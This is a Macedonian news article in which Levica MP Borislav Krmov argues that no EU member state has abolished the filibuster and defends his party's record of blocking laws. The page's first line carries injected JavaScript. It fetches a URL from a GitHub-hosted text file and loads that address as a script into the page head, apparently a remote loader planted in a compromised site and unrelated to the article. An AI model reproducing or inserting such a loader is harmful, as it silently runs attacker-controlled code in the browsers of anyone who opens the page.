;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Крмов: Ниту една членка на ЕУ го нема укинато филибастерингот - Антропол
АктуелноЛокално

Крмов: Ниту една членка на ЕУ го нема укинато филибастерингот

  • Пратеникот на Левица Борислав Крмов зборуваше за укинувањето на филибастерингот од страна на широката коалиција формирана од СДСМ, ДПМНЕ и ДУИ, и посочи дека ниту една земја членка на ЕУ, ја нема укината можноста за филибастеринг на опозицијата. Тој додаде дека во Македонија 90% од законите се носат по скратена постапка, а со ова се укинува и онака премалата можност за контрола на власта од страна на опозицијата. Во интервјуто за ТВ Стар тој изјави:

Имаме инфлација на Закони. Закони менувани по 30-40 пати, таму нема ниту кoнцепт што сака да се постигне, имате „ад-хок“ решенија, каде едни одредби се спротивни со други. Филибастер е стара институција уште од римско време, кога Катон Помладиот држел бескрајни говори да го блокира Цезар во неговите реформи. Ниту една држава, ниту во Европа ниту во регионот, нема укинато филибастеринг. Не им паѓа на памет да укинат филибастеринг.

Еве, да земеме пример што има блокирано Левица. Левица го има блокирано деловникот каде што сакаа да имаат онлајn седници, ние тоа го нарековме „вечен кворум“. Тоа и сега ќе важеше, затоа што имаме кризана состојба со КОВИД. Значи ќе немавме потреба од кворум. Само лаптопи ќе имаа вклучено Али Ахмети и компанија, само со штипкичка слика ќе имаа закажано.

Блокиравме носење на етничка припадност во лични карти, систем со кој се има вршено геноцидот во Руанда. Го блокиравме безобразно покачени плати на судиите. Блокиравме „Северна“ во Лични карти. Тие немаат проблем да функционира владата и да носи закони. Зошто? – Како првo дека европскиот пат ќе биде закочен е чиста лага. Веќе ја имаш таа комисија за европски прашања, каде се поврзано со ЕУ оди таму, тие закони не се блокираат.

Второ, не можеш да блокираш пари. Зошто и буџет и економија не можат да се блокираат. И што блокиравме, Закон за државјанство што беше срамен и катастрофален закон, со кој луѓе можеа да земат државјанство со сметка од парно.

Кога дојде законот за Бихтел и Енка не ставија ништо, ставија празни табели, и нашиот сограѓанин Министерот Бочварски имаше потпишано празна табела што е кривично дело. Ем имаш злоупотреба на сето ова, и оној мал дел што останува за контрола на власта, и тоа го укинаа. 90% од законите ги носат по скратена постапка.